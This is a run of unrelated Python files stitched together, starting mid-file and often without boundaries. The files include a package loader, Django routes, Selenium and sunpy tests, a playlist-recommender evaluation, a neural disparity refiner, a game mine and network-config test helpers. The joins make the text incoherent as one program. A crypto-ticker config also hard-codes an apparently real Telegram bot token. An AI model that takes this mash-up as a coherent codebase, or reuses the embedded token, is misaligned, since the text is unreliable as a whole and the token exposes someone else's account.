plt.axvspan(1.25, 1.55, facecolor='#2ca02c', alpha=0.5)
plt.show()
|
import importlib
import os
import sys
from logging import getLogger
from typing import List
from omnium.omnium_errors import OmniumError
from omnium.pkg_state import PkgState
from omnium.version import get_version
from omnium.suite import Suite
from omnium.utils import check_git_commits_equal, cd
from .analyser import Analyser
# Module-level logger for the analysis-package machinery.
logger = getLogger('om.analysis_pkg')
class AnalysisPkg(dict):
    """Wrapper around an analysis package.

    An analysis package is a python package that has certain variables.

    It must have in its top level:
    __version__: Tuple[int]
    analyser_classes: List[Analyser]
    analysis_settings_filename: str - where settings.json will get written to
    analysis_settings = Dict[str, AnalysisSettings]

    Maps analysis_name -> analyser class, and verifies the package's git
    checkout matches the commit pinned in the suite's app config.
    """
    def __init__(self, name: str, pkg, suite: Suite):
        self.name = name
        self.pkg = pkg
        self.suite = suite
        self.state = PkgState(self.pkg)
        self.version = self.pkg.__version__
        self.pkg_dir = os.path.dirname(self.pkg.__file__)

        for cls in pkg.analyser_classes:
            # Bug fix: keys are analysis names, so membership must be tested
            # with cls.analysis_name; testing `cls` always missed, silently
            # overwriting duplicates and never emitting the warning.
            if cls.analysis_name not in self:
                self[cls.analysis_name] = cls
            else:
                # Bug fix: stdlib logging uses lazy %-style args, not '{}'.
                logger.warning('Multiple analysis classes named: %s', cls)

        self.analysis_settings = self.pkg.analysis_settings
        self.analysis_settings_filename = self.pkg.analysis_settings_filename

        # Fail fast if the checkout is not at the commit pinned by the suite.
        analysis_pkg_config = self.suite.app_config['analysis_{}'.format(self.name)]
        commit = analysis_pkg_config['commit']
        with cd(self.pkg_dir):
            if not check_git_commits_equal('HEAD', commit):
                msg = 'analysis_pkg {} not at correct version'.format(self.name)
                logger.error(msg)
                logger.error('try running `omnium analysis-setup` to fix')
                raise OmniumError(msg)
class AnalysisPkgs(dict):
    """Contains all analysis packages.

    Maps package name -> AnalysisPkg and keeps reverse lookups from
    analyser class to its owning package.
    """
    def __init__(self, analysis_pkg_names: List[str], suite: Suite):
        self._analysis_pkg_names = analysis_pkg_names
        self.suite = suite
        self._cls_to_pkg = {}
        self.analyser_classes = {}
        self.have_found = False
        if self.suite.is_in_suite:
            self._load()

    def _load(self):
        """Discover and import every configured analysis package (once)."""
        if self.have_found:
            raise OmniumError('Should only call load once')

        analysis_pkgs_dir = os.path.join(self.suite.suite_dir, '.omnium/analysis_pkgs')
        if not os.path.exists(analysis_pkgs_dir):
            # Bug fix: stdlib logging uses lazy %-style args, not '{}'.
            logger.warning('analysis_pkg_dir: %s does not exist', analysis_pkgs_dir)
            return
        # Make every vendored package importable.
        for analysis_pkg_dir in os.listdir(analysis_pkgs_dir):
            sys.path.append(os.path.join(analysis_pkgs_dir, analysis_pkg_dir))
        if self._analysis_pkg_names:
            # First dir takes precedence over second etc.
            for analyser_pkg_name in self._analysis_pkg_names:
                try:
                    pkg = importlib.import_module(analyser_pkg_name)
                except ImportError as e:
                    # Bug fix: %-style lazy formatting for logging args.
                    logger.error("Package '%s' not found on PYTHONPATH", analyser_pkg_name)
                    logger.error("Or could not load it")
                    logger.error(e)
                    continue
                analysis_pkg = AnalysisPkg(analyser_pkg_name, pkg, self.suite)
                for cls_name, cls in analysis_pkg.items():
                    self._cls_to_pkg[cls] = analysis_pkg
                    self.analyser_classes[cls_name] = cls
                self[analyser_pkg_name] = analysis_pkg

        self.have_found = True

    def get_settings(self, analyser_cls, settings_name):
        """Return (settings_filename, settings) for the given analyser class.

        Raises:
            OmniumError: when settings_name is not defined by the package.
        """
        analysis_pkg = self._cls_to_pkg[analyser_cls]
        # Bug fix: %-style lazy formatting for logging args.
        logger.debug('analysis_cls %s in package %s', analyser_cls, analysis_pkg.name)
        settings_dict = analysis_pkg.analysis_settings
        if settings_name not in settings_dict:
            raise OmniumError('Settings {} not defined in {}, choices are {}'
                              .format(settings_name, analysis_pkg, settings_dict.keys()))
        return analysis_pkg.analysis_settings_filename, settings_dict[settings_name]

    def get_package(self, analyser_cls: Analyser) -> AnalysisPkg:
        """Return the AnalysisPkg that owns the given analyser class."""
        return self._cls_to_pkg[analyser_cls]

    def get_package_version(self, analyser_cls):
        """Return the version string of the package owning analyser_cls."""
        analysis_pkg = self._cls_to_pkg[analyser_cls]
        return AnalysisPkgs._get_package_version(analysis_pkg)

    @staticmethod
    def _get_package_version(package):
        # e.g. "mypkg_v1.2.3" — medium form of the package's version tuple.
        return package.pkg.__name__ + '_v' + get_version(package.pkg.__version__, form='medium')
|
# import numpy as np
def weighted_mean(x, w):
    """Return the weighted average of *x* with weights *w*, rounded to 1 dp."""
    weighted_total = 0
    weight_total = 0
    for value, weight in zip(x, w):
        weighted_total += value * weight
        weight_total += weight
    return round(weighted_total / weight_total, 1)
def main():
    """Read count, values and weights from stdin; print the weighted mean."""
    # First line is the element count; parsed for validation, then ignored
    # because the value/weight rows are split in full.
    int(input())
    values = [int(token) for token in input().split()]
    weights = [int(token) for token in input().split()]
    print(weighted_mean(values, weights))


if __name__ == "__main__":
    main()
|
__name__ = 'tcvaemolgen'
from .tcvaemolgen import bridge, \
interfaces, \
models, \
patterns, \
preprocessing, \
reporting, \
structurs, \
train, \
utils, \
visualization |
from django.urls import path
from . import views
# URL namespace used by {% url 'blog:...' %} lookups.
app_name = 'blog'
urlpatterns = [
    # Canonical post URL: publication date plus slug.
    path('<int:year>/<int:month>/<int:day>/<slug:slug>/',
         views.post_detail,
         name='post_detail'),
    # Posts filtered by tag.
    path('tag/<slug:slug>/',
         views.tag_detail,
         name='tag_detail'),
    # Blog landing page.
    path('', views.post_index, name='post_index'),
]
import numpy as np
import parser
def parse(code, **kwargs):
    """
    Fake parsing code with arguments.

    Args:
        code: source text to parse.
        **kwargs: forwarded to ast.parse (e.g. filename, mode).

    Returns:
        ast.Module (or the node type implied by `mode`).
    """
    # Bug fix: the body referenced `ast` but the module never imported it
    # (only the unrelated, deprecated `parser` module) — NameError at call.
    import ast
    return ast.parse(code, **kwargs)
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import keyboard
from time import sleep
import unittest
class TestPageLoad(unittest.TestCase):
    """Smoke test: the code.gov landing page loads with the expected title."""

    def setUp(self):
        browser = webdriver.Firefox()
        self.browser = browser
        # Ensure the browser is closed even when a test fails.
        self.addCleanup(browser.quit)

    def testPageTitle(self):
        self.browser.get('https://code.gov')
        self.assertIn('code.gov', self.browser.title)
class TestHomeArea(unittest.TestCase):
    """Exercise the hero-area controls on the code.gov landing page."""

    def setUp(self):
        browser = webdriver.Firefox()
        self.browser = browser
        self.addCleanup(browser.quit)
        browser.get('https://code.gov')

    def testOpenTasks(self):
        tasks_button = self.browser.find_element_by_xpath('//button[text()="Explore Open Tasks"]')
        tasks_button.click()
        self.assertEqual(self.browser.current_url, 'https://code.gov/#!/help-wanted')

    # Used keyboard and execute_script because webdriver incorrectly
    # considered search bar to be hidden
    # https://github.com/mozilla/geckodriver/issues/1173
    def testSearchBar(self):
        self.browser.execute_script('''
            document.querySelector("[title='Search Code.gov']").focus();
        ''')
        sleep(5)
        keyboard.write('python')
        sleep(1)
        keyboard.send('enter')
        sleep(5)
        self.assertEqual(self.browser.current_url, 'https://code.gov/#!/search?q=python')
# Run the Selenium suite with per-test output when executed directly.
if __name__ == '__main__':
    unittest.main(verbosity=2)
|
from nanome._internal._ui._serialization import _MenuSerializer, _LayoutNodeSerializer, _UIBaseSerializer
from nanome._internal._util._serializers import _ArraySerializer
from nanome._internal._util._serializers import _TypeSerializer
class _ReceiveMenu(_TypeSerializer):
    """Deserializer for a full menu payload: menu, layout nodes, UI content."""

    def __init__(self):
        self.menu = _MenuSerializer()
        self.array = _ArraySerializer()
        self.layout = _LayoutNodeSerializer()
        self.content = _UIBaseSerializer()

    def version(self):
        return 0

    def name(self):
        return "ReceiveMenu"

    def serialize(self, version, value, context):
        # Receive-only message type: nothing is ever written.
        pass

    def deserialize(self, version, context):
        """Read the menu, its layout nodes and its contents, in that order."""
        menu = context.read_using_serializer(self.menu)
        # The shared array serializer is re-typed before each read.
        self.array.set_type(self.layout)
        nodes = context.read_using_serializer(self.array)
        self.array.set_type(self.content)
        contents = context.read_using_serializer(self.array)
        # Returns 3 params as a tuple.
        return menu, nodes, contents
#!/usr/bin/env python
import itertools
import sys
import random
import zorder
# NOTE: Python 2 script (long(), print statements below).
PRNG = random.SystemRandom()  # unbiased OS-backed randomness
COUNT = 1000  # maximum number of coordinate tuples to emit
# Command line: <dimension> <min coordinate> <max coordinate>
coord_dimension = long(sys.argv[1])
coord_min_value = long(sys.argv[2])
coord_max_value = long(sys.argv[3])
assert coord_max_value >= coord_min_value
coord_range = coord_max_value - coord_min_value
coord_bitsize = coord_range.bit_length()
# One Z-order encoder wide enough for every dimension at full bit width.
encoder = zorder.ZEncoder(ndim=coord_dimension, bits=(coord_bitsize * coord_dimension))
def cull(v):
    # Clamp v into the inclusive [coord_min_value, coord_max_value] range.
    return min(coord_max_value, max(coord_min_value, v))
def encode(coordinates):
    # Clamp, shift each coordinate to zero-based, then Z-order encode.
    shifted = [cull(v) - coord_min_value for v in coordinates]
    return encoder.encode(shifted)
def repeat(fun, n):
    # Call fun() n times and collect the results in order.
    results = []
    for _ in range(n):
        results.append(fun())
    return results
def run():
    """Emit up to COUNT distinct coordinate tuples, each printed as an
    Erlang-style term '{{coords}, zcode}.' with its Z-order encoding."""
    max_coord_count = (coord_range + 1) ** coord_dimension
    count = min(COUNT, max_coord_count)
    print >>sys.stderr, (
        'generating %d %dd values for coordinates between [%d, %d]' %
        (count, coord_dimension, coord_min_value, coord_max_value))
    if count >= max_coord_count:
        # generate sequentially
        # (the full coordinate space is small enough to enumerate)
        coord_value_possibilities = range(coord_min_value, coord_max_value + 1)
        all_coordinates = itertools.product(
            coord_value_possibilities, repeat = coord_dimension)
    else:
        # brute force
        # sample without replacement until COUNT distinct tuples collected
        all_coordinates = set()
        while len(all_coordinates) < COUNT:
            coordinates = tuple(
                repeat(
                    lambda: PRNG.randint(coord_min_value, coord_max_value),
                    coord_dimension))
            all_coordinates.add(coordinates)
        all_coordinates = sorted(list(all_coordinates))
    #print
    for coordinates in all_coordinates:
        coordinates_str = '{%s}' % ','.join(map(str, coordinates))
        print '{%s, %d}.' % (coordinates_str, encode(coordinates))
# Script entry point.
run()
|
from .raster_tools import ropen, read
from .vector_tools import vopen
from .classification.classification import classification, classification_r
from .classification.error_matrix import error_matrix, object_accuracy
from .classification.change import change
from .classification._moving_window import moving_window
from .classification._morph_cells import morph_cells
from .classification.reclassify import reclassify
from .classification.recode import recode
from .classification.sample_raster import sample_raster
from .raster_calc import raster_calc
from .veg_indices import veg_indices, VegIndicesEquations
from .vrt_builder import vrt_builder
from .testing.test import main as test
from .version import __version__
# Public API of the package; every name is re-exported by the imports above.
__all__ = ['ropen',
           'read',
           'vopen',
           'classification', 'classification_r',
           'error_matrix', 'object_accuracy',
           'moving_window', 'morph_cells', 'change', 'reclassify', 'recode',
           'raster_calc',
           'veg_indices', 'VegIndicesEquations',
           'vrt_builder',
           'test',
           '__version__']
|
import pandas
from sklearn import model_selection
from sklearn.linear_model import LogisticRegression
import pickle
import codecs
import json
import gensim
import numpy as np
import math
import random
import numpy
import operator
import scipy
import Queue
from heapq import nlargest
# Evaluation Metrics
def r_precision(G, R):
    """Fraction of ground-truth items G found in the first len(G) items of R.

    Returns 0 when G is empty.
    """
    if not G:
        return 0
    top = set(R[:len(G)])
    return len(set(G) & top) * 1.0 / len(G)
def ndcg(G, R):
    """Normalized discounted cumulative gain of ranking R against ground
    truth G, with binary relevance (1 if an item of R appears in G).

    The ideal DCG assumes all len(G) relevant items are ranked first.
    Returns 0 when G or R is empty (the original raised IndexError on
    an empty R).
    """
    if not G or not R:
        return 0
    relevant = set(G).intersection(set(R))
    # np.asfarray was removed in NumPy 2.0; asarray with float dtype is
    # the supported equivalent.
    r = np.asarray([1 if i in relevant else 0 for i in R], dtype=float)
    dcg = r[0] + np.sum(r[1:] / np.log2(np.arange(2, r.size + 1)))
    #k = len(set(G).intersection(set(R)))
    k = len(G)
    idcg = 1 + np.sum(np.ones(k - 1) / np.log2(np.arange(2, k + 1)))
    return dcg * 1.0 / idcg
def clicks(G, R):
    """Number of 10-track 'page refreshes' needed before the first item of
    R that is relevant (appears in ground truth G) is seen.

    A hit at 0-based positions 0-9 costs 0 clicks, 10-19 costs 1, etc.
    Returns 51 (one more than the 500/10 maximum) when nothing in R is
    relevant.
    """
    relevant = set(G).intersection(set(R))
    r = [1 if i in relevant else 0 for i in R]
    if sum(r) == 0:
        return 51
    # Bug fix: the original computed (index - 1) * 1.0 / 10, which yields a
    # negative value (-0.1) when the very first item is relevant; the metric
    # is floor(first_relevant_index / 10).
    return r.index(1) // 10
# Calculation Tools
def find_nearest_k(pid, k):
    """Return the k vocabulary tracks most cosine-similar to the playlist
    vector PL_Word2Vec_TEST[pid] (best first)."""
    global PL_Word2Vec_TEST
    global TEST
    # Hoist the playlist vector out of the loop; it is invariant.
    pl_vec = np.array(PL_Word2Vec_TEST[pid])
    sim = {}
    for track in model.wv.vocab.keys():
        sim[track] = 1 - scipy.spatial.distance.cosine(pl_vec, np.array(model.wv[track]))
    # Bug fix: the original inverted `sim` into a {score: track} dict, which
    # silently drops tracks sharing a similarity score (and raised IndexError
    # when fewer than k distinct scores existed). nlargest keeps all tracks.
    return nlargest(k, sim, key=sim.get)
# Load Model (MUST USE LATEST ONE)
model = gensim.models.Word2Vec.load('song2vec_GT5_TRAIN')
# Calculate the average vector
# (used later as a fallback embedding for out-of-vocabulary tracks)
track_sum_vec = np.zeros(100, dtype = float)
for track in model.wv.vocab:
    track_sum_vec += model.wv[track]
track_average_vec = track_sum_vec / len(model.wv.vocab)
all_test_tracks = model.wv.vocab.keys()
# Recommendation
# Evaluate the word2vec recommender on 10 held-out test tasks; append
# mean/std of each metric to Model_2_Performance_500.txt.
for task in range(10):
    print "Starting TASK " + str(task)
    print "Loading Data..."
    TEST = json.load(open('../DATA_PROCESSING/PL_TRACKS_5_TEST_T' + str(task) + '.json'))
    # Evaluate on the first 500 playlists only.
    SUB_TEST_PL = TEST.keys()[:500]
    SUB_TEST = {k:v for (k,v) in TEST.items() if k in SUB_TEST_PL}
    # Load Ground Truth
    TEST_GROUND_TRUTH_RAW = json.load(open('../DATA_PROCESSING/PL_TRACKS_5_TEST.json'))
    TEST_GROUND_TRUTH = {}
    for pl in SUB_TEST:
        TEST_GROUND_TRUTH[pl] = TEST_GROUND_TRUTH_RAW[pl]
    # Word2Vec for PL
    # Playlist vector = mean of its tracks' vectors; out-of-vocabulary
    # tracks contribute the global average vector instead.
    PL_Word2Vec_TEST = {}
    for pl in SUB_TEST:
        current = np.zeros(100)
        length = 0
        for track in SUB_TEST[pl]:
            if track in model.wv:
                current += model.wv[track]
            else:
                current += track_average_vec
            length += 1
        if length != 0:
            PL_Word2Vec_TEST[pl] = list(current / length)
        else:
            PL_Word2Vec_TEST[pl] = track_average_vec
    print 'Loading Ground Truth...'
    R = {}
    G = {}
    # Targets are ground-truth tracks not already in the seed playlist.
    for pl in TEST_GROUND_TRUTH:
        G[pl] = list(set(TEST_GROUND_TRUTH[pl]).difference(set(SUB_TEST[pl])))
    print 'Finding Nearest K Neighbors...'
    for pl in SUB_TEST:
        R[pl] = find_nearest_k(pl, 500)
    print 'Evaluating...'
    print 'R_Precision:'
    r_pre_result = []
    for pl in SUB_TEST.keys():
        r_pre_result.append(r_precision(G[pl], R[pl]))
    r_pre_result = np.array(r_pre_result)
    print '\tmean:', r_pre_result.mean(), 'std:', r_pre_result.std()
    with open('Model_2_Performance_500.txt', 'a') as f:
        f.write('TASK_' + str(task) +' R_Precision_Mean '+str(r_pre_result.mean())+' R_Precision_Std '+ str(r_pre_result.std()) + '\n')
    print 'NDCG:'
    ndcg_result = []
    for pl in SUB_TEST.keys():
        ndcg_result.append(ndcg(G[pl], R[pl]))
    ndcg_result = np.array(ndcg_result)
    print '\tmean:', ndcg_result.mean(), 'std:', ndcg_result.std()
    with open('Model_2_Performance_500.txt', 'a') as f:
        f.write('TASK_' + str(task) +' NDCG_Mean '+str(ndcg_result.mean())+' NDCG_Std '+ str(ndcg_result.std()) + '\n')
    print 'Clicks:'
    clicks_result = []
    for pl in SUB_TEST.keys():
        clicks_result.append(clicks(G[pl], R[pl]))
    clicks_result = np.array(clicks_result)
    print '\tmean:', clicks_result.mean(), 'std:', clicks_result.std()
    with open('Model_2_Performance_500.txt', 'a') as f:
        f.write('TASK_' + str(task) +' Clicks_Mean '+str(clicks_result.mean())+' Clicks_Std '+ str(clicks_result.std()) + '\n')
    print '========================================\n'
|
from yubi.users.models.users import User
from yubi.users.models.profiles import Profile |
import test

# Demo driver for the local `test` module.
circum = test.circumference(4)
#print("circumference: ", circum)
h = input("Enter name?")
s = input("Enter name 2?")
print(h ," and ",s, " are awesome!")
#circum = test.circumference(radius)
#print("circumference: ", circum)
# NOTE(review): assumes test.new_function returns a string -- verify,
# otherwise the string concatenation below raises TypeError.
bff = test.new_function(h, 1000)
print("bff = " + bff)
|
import os

# Bot API token; prefer the TOKEN_BOT environment variable so the secret
# need not live in source control (falls back to the legacy hard-coded
# value for backward compatibility -- that token should be revoked).
TOKEN_BOT = os.environ.get('TOKEN_BOT', '522701018:AAFVnFzfkYnJyBwzRR9gsKBRyvgmF60Pdpc')
# Seconds between periodic refreshes.
TIME_INTERVAL = 30
# CoinMarketCap v1 API endpoints.
URL_COINMARKET_SIMPLE_API = "https://api.coinmarketcap.com/v1/ticker/{}"
COINMARKET_API_URL_COINSLIST = 'https://api.coinmarketcap.com/v1/ticker/?limit=0'
COINMARKET_API_URL_GLOBAL = 'https://api.coinmarketcap.com/v1/global/'
# JSON cache files stored next to this module.
FILE_JSON_COINMARKET = os.path.dirname(os.path.realpath(__file__)) + '/coinmarketcoins.json'
FILE_JSON_GLOBALINFOAPI = os.path.dirname(os.path.realpath(__file__)) + '/globalinfoapijson.json'
class JSONFiles:
    """In-memory holder for the two cached CoinMarketCap API payloads."""

    def __init__(self):
        # Full coin list (list of dicts) and global-market info (dict).
        self.coinmarketcapjson = []
        self.globalinfoapijson = {}

    def change_coinmarketcapjson(self, json1):
        """Replace the cached coin list; returns the stored value.

        Raises TypeError if json1 is not a list.
        """
        # Validate explicitly: `assert` is stripped under `python -O`.
        if not isinstance(json1, list):
            raise TypeError('coin list payload must be a list')
        self.coinmarketcapjson = json1
        return json1

    def change_globalinfoapijson_json(self, json2):
        """Replace the cached global-info payload; returns the stored value.

        Raises TypeError if json2 is not a dict.
        """
        if not isinstance(json2, dict):
            raise TypeError('global info payload must be a dict')
        self.globalinfoapijson = json2
        return json2
# Module-level singleton holding the cached JSON payloads from the API.
jsonfiles = JSONFiles()
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from .utils.edge_aware import EdgeAwareRefinement
class StereoNetRefinement(nn.Module):
    """Disparity refinement stage from StereoNet.

    Cascades `num` edge-aware refinement blocks on top of the (upsampled)
    coarse disparity estimate.

    Args:
        in_planes (int): number of input channels.
        batch_norm (bool): whether the blocks use batch normalization.
        num (int): how many edge-aware refinement blocks to cascade.

    Inputs:
        disps (list of Tensor): estimated disparity maps, [B, 1, H//s, W//s].
        left / right (Tensor): image features, [B, C, H, W].
        leftImage / rightImage (Tensor): images, [B, 3, H, W].

    Outputs:
        refine_disps (list of Tensor): refined disparity maps at full
        resolution [B, 1, H, W], most-refined first.
    """

    def __init__(self, in_planes, batch_norm=True, num=1):
        super(StereoNetRefinement, self).__init__()
        self.in_planes = in_planes
        self.batch_norm = batch_norm
        self.num = num
        # One edge-aware refinement block per cascade stage.
        self.refine_blocks = nn.ModuleList([
            EdgeAwareRefinement(self.in_planes, self.batch_norm)
            for _ in range(self.num)
        ])

    def forward(self, disps, left, right, leftImage, rightImage):
        # StereoNet produces a single coarse estimate; take the last one.
        coarse = disps[-1]

        # Upsample to full image resolution; disparity values must be
        # rescaled by the same horizontal factor as the upsampling.
        full_h, full_w = leftImage.shape[-2:]
        scale = full_w / coarse.shape[-1]
        disp = F.interpolate(coarse, size=(full_h, full_w),
                             mode='bilinear', align_corners=False)
        disp = disp * scale

        # Refine repeatedly, each block consuming the previous output.
        refine_disps = [disp]
        for refine in self.refine_blocks:
            refine_disps.append(refine(refine_disps[-1], leftImage))

        # Keep the better (more refined) disparity maps ahead of the worse.
        refine_disps.reverse()
        return refine_disps
|
from __future__ import annotations
from typing import TYPE_CHECKING
import ba
from bastd.actor import bomb as stdbomb
from bd.me import bomb, MeBomb, blast
from bd.actor import AutoAim
if TYPE_CHECKING:
from typing import Sequence, Union
@bomb('elon_mine', is_mine=True, blast_coefficient=0.7, arm_time=0.5)
class ElonMine(MeBomb):
    """Custom land-mine bomb variant registered through the @bomb decorator."""
    def init(self, actor: stdbomb.Bomb, position: Sequence[Union[int, float]],
             velocity: Sequence[Union[int, float]], materials: Sequence[ba.Material]):
        # Build the mine's scene node from stock land-mine assets, but with
        # a crosshair texture.
        factory = stdbomb.BombFactory.get()
        actor.node = ba.newnode('prop', delegate=actor, attrs={
            'body': 'landMine',
            'model': factory.land_mine_model,
            'light_model': factory.land_mine_model,
            'color_texture': ba.gettexture('achievementCrossHair'),
            'position': position,
            'velocity': velocity,
            'shadow_size': 0.44,
            'reflection': 'powerup',
            'reflection_scale': [1],
            'materials': materials})
    def arm(self, actor: stdbomb.Bomb):
        # Arming sequence: flash the texture, beep, attach auto-aim, then
        # make the mine explodable shortly afterwards.
        factory = stdbomb.BombFactory.get()
        elon_mine_lit_tex = ba.gettexture('circleNoAlpha')
        elon_mine_tex = ba.gettexture('achievementCrossHair')
        # Blink between lit/unlit textures while arming.
        actor.texture_sequence = ba.newnode(
            'texture_sequence', owner=actor.node, attrs={
                'rate': 30,
                'input_textures': (elon_mine_lit_tex,
                                   elon_mine_tex)})
        ba.timer(0.5, actor.texture_sequence.delete)
        ba.playsound(ba.getsound('activateBeep'),
                     position=actor.node.position)
        actor.aim = AutoAim(actor.node, actor.owner)
        # we now make it explodable.
        ba.timer(0.25, ba.WeakCall(actor._add_material,
                                   factory.land_mine_blast_material))
        actor.texture_sequence.connectattr('output_texture', actor.node,
                                           'color_texture')
|
import pytest
from sunpy.time.timerange import TimeRange
from sunpy.time import parse_time
from sunpy.net.vso.attrs import Time, Instrument
from sunpy.net.dataretriever.client import QueryResponse
import sunpy.net.dataretriever.sources.lyra as lyra
from sunpy.net.fido_factory import UnifiedResponse
from sunpy.net import Fido
from sunpy.net import attrs as a
from hypothesis import given, settings
from sunpy.net.tests.strategies import time_attr
# Shared LYRA client instance used by all the tests below.
LCClient = lyra.LYRAClient()
# Each case: (query time range, expected first URL, expected last URL).
@pytest.mark.parametrize("timerange,url_start,url_end", [
    (TimeRange('2012/1/7', '2012/1/7'),
     'http://proba2.oma.be/lyra/data/bsd/2012/01/07/lyra_20120107-000000_lev2_std.fits',
     'http://proba2.oma.be/lyra/data/bsd/2012/01/07/lyra_20120107-000000_lev2_std.fits'
     ),
    (TimeRange('2012/12/1', '2012/12/2'),
     'http://proba2.oma.be/lyra/data/bsd/2012/12/01/lyra_20121201-000000_lev2_std.fits',
     'http://proba2.oma.be/lyra/data/bsd/2012/12/02/lyra_20121202-000000_lev2_std.fits'
     ),
    (TimeRange('2012/4/7', '2012/4/14'),
     'http://proba2.oma.be/lyra/data/bsd/2012/04/07/lyra_20120407-000000_lev2_std.fits',
     'http://proba2.oma.be/lyra/data/bsd/2012/04/14/lyra_20120414-000000_lev2_std.fits'
     )
])
def test_get_url_for_time_range(timerange, url_start, url_end):
    """URL list for a time range starts/ends with the expected daily files."""
    urls = LCClient._get_url_for_timerange(timerange)
    assert isinstance(urls, list)
    assert urls[0] == url_start
    assert urls[-1] == url_end
def test_get_url_for_date():
    """A single date maps to that day's level-2 standard FITS file URL."""
    url = LCClient._get_url_for_date(parse_time((2013, 2, 13)))
    assert url == 'http://proba2.oma.be/lyra/data/bsd/2013/02/13/lyra_20130213-000000_lev2_std.fits'
@given(time_attr())
def test_can_handle_query(time):
    """Client accepts time + Instrument('lyra') queries, rejects time-only."""
    ans1 = lyra.LYRAClient._can_handle_query(
        time, Instrument('lyra'))
    assert ans1 is True
    ans2 = lyra.LYRAClient._can_handle_query(time)
    assert ans2 is False
@settings(deadline=50000)
@given(time_attr())
def test_query(time):
    """Search returns a QueryResponse spanning exactly the requested range."""
    qr1 = LCClient.search(time, Instrument('lyra'))
    assert isinstance(qr1, QueryResponse)
    assert qr1.time_range().start == time.start
    assert qr1.time_range().end == time.end
@pytest.mark.remote_data
@pytest.mark.parametrize("time,instrument", [
    (Time('2013/8/27', '2013/8/27'), Instrument('lyra')),
    (Time('2013/2/4', '2013/2/6'), Instrument('lyra')),
])
def test_get(time, instrument):
    """Fetching downloads one file per query-response row (network test)."""
    qr1 = LCClient.search(time, instrument)
    res = LCClient.fetch(qr1)
    download_list = res.wait(progress=False)
    assert len(download_list) == len(qr1)
@pytest.mark.remote_data
@pytest.mark.parametrize(
    "time, instrument",
    [(a.Time('2012/10/4', '2012/10/6'), a.Instrument('lyra')),
     (a.Time('2013/10/5', '2013/10/7'), a.Instrument('lyra'))])
def test_fido(time, instrument):
    """End-to-end Fido search + fetch downloads every file found (network test)."""
    qr = Fido.search(time, instrument)
    assert isinstance(qr, UnifiedResponse)
    response = Fido.fetch(qr)
    assert len(response) == qr._numfile
|
# encoding: utf-8
import unittest
import mrep.morph
class ParseTest(unittest.TestCase):
    """Tests for mrep.morph.MeCabParser."""

    def test_parse(self):
        # Parsing a simple sentence yields the expected surface/POS pairs.
        parser = mrep.morph.MeCabParser()
        morphemes = parser.parse('我輩は猫だ')
        expected = [
            {'surface': '我輩', 'pos': '代名詞'},
            {'surface': 'は', 'pos': '助詞'},
            {'surface': '猫', 'pos': '名詞'},
            {'surface': 'だ', 'pos': '助動詞'},
        ]
        self.assertEqual(len(expected), len(morphemes))
        for want, got in zip(expected, morphemes):
            self.assertEqual(want['surface'], got['surface'])
            self.assertEqual(want['pos'], got['pos'])

    def test_invalid_argument(self):
        # An unknown MeCab option must raise on construction.
        self.assertRaises(Exception,
                          lambda: mrep.morph.MeCabParser('--invalid-arg'))
|
#
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
import sys
import gevent
from time import sleep
from testtools.matchers import Equals, Contains, Not
import test_case
from vnc_api.vnc_api import *
from device_api.juniper_common_xsd import *
#
# All generic utility methods should go here
#
class TestCommonDM(test_case.DMTestCase):
    """Generic helpers shared by device-manager test cases: accessors for
    sections of the generated Juniper configuration and convenience
    setters for BGP router parameters."""

    def set_obj_param(self, obj, param, value):
        """Call obj.set_<param>(value)."""
        fun = getattr(obj, "set_" + param)
        fun(value)
    # end set_obj_param

    def get_obj_param(self, obj, param):
        """Return obj.get_<param>()."""
        fun = getattr(obj, "get_" + param)
        return fun()
    # end get_obj_param

    def get_bgp_groups(self, config, bgp_type=''):
        """Return BGP groups from config, optionally filtered by type."""
        protocols = config.get_protocols()
        bgp = protocols.get_bgp()
        bgp_groups = bgp.get_group()
        grps = []
        for gp in bgp_groups or []:
            if not bgp_type or bgp_type == gp.get_type():
                grps.append(gp)
        return grps
    # end get_bgp_groups

    def get_dynamic_tunnels(self, config):
        """Return the dynamic-tunnels section, or None if routing options
        are absent."""
        ri_opts = config.get_routing_options()
        if not ri_opts:
            return None
        return ri_opts.get_dynamic_tunnels()
    # end get_dynamic_tunnels

    def get_routing_instances(self, config, ri_name=''):
        """Return routing instances, optionally filtered by name."""
        ri_list = config.get_routing_instances()
        ri_list = ri_list.get_instance() or []
        ris = []
        for ri in ri_list or []:
            if not ri_name or ri.get_name() == ri_name:
                ris.append(ri)
        return ris

    def get_interfaces(self, config, name=''):
        """Return interfaces, optionally filtered by name."""
        interfaces = config.get_interfaces()
        if not interfaces:
            return []
        interfaces = interfaces.get_interface()
        intfs = []
        for intf in interfaces or []:
            if not name or name == intf.get_name():
                intfs.append(intf)
        return intfs
    # end get_interfaces

    def get_ip_list(self, intf, ip_type='v4', unit_name=''):
        """Return the inet ('v4') or inet6 addresses configured on intf's
        units, optionally restricted to a single unit."""
        units = intf.get_unit() or []
        ips = []
        for ut in units:
            if unit_name and ut.get_name() != unit_name:
                continue
            f = ut.get_family() or Family()
            inet = None
            if ip_type == 'v4':
                inet = f.get_inet()
            else:
                inet = f.get_inet6()
            addrs = inet.get_address() or []
            for a in addrs:
                ips.append(a.get_name())
        return ips

    def set_hold_time(self, bgp_router, value):
        """Set the BGP hold-time parameter on bgp_router."""
        params = self.get_obj_param(bgp_router, 'bgp_router_parameters') or BgpRouterParams()
        # Bug fix: the hold time was hard-coded to 100, silently ignoring
        # the `value` argument.
        self.set_obj_param(params, 'hold_time', value)
        self.set_obj_param(bgp_router, 'bgp_router_parameters', params)
    # end set_hold_time

    def set_auth_data(self, bgp_router, token, password, auth_type):
        """Attach authentication data (a single key item) to bgp_router."""
        params = self.get_obj_param(bgp_router, 'bgp_router_parameters') or BgpRouterParams()
        key = AuthenticationKeyItem(token, password)
        self.set_obj_param(params, 'auth_data', AuthenticationData(auth_type, [key]))
        self.set_obj_param(bgp_router, 'bgp_router_parameters', params)
    # end set_auth_data
# end
|
import sys
import csv
import datetime
import calendar
import re
# number of views by day
# number of unique visitors by day
# articles
# number of visitors by article by day
# top 10 most visitors for an article across all days:
# "2018-11-01 article A: 40 visitors, 2018-11-05 article B: 36 visitors, ...")
# top 10 articles: total unique visitors
# (full list at bottom of output)
# top 10 articles: viewed by percent of seen visitors
# (full list at bottom of output)
# top 10 articles: total views, percent of total views
# (full list at bottom of output)
# top 10 articles: views per visitor per day
# (full list at bottom of output)
# search engines
# top 10 most-viewed articles: percent of views with each referrer domain
# (full list at bottom of output)
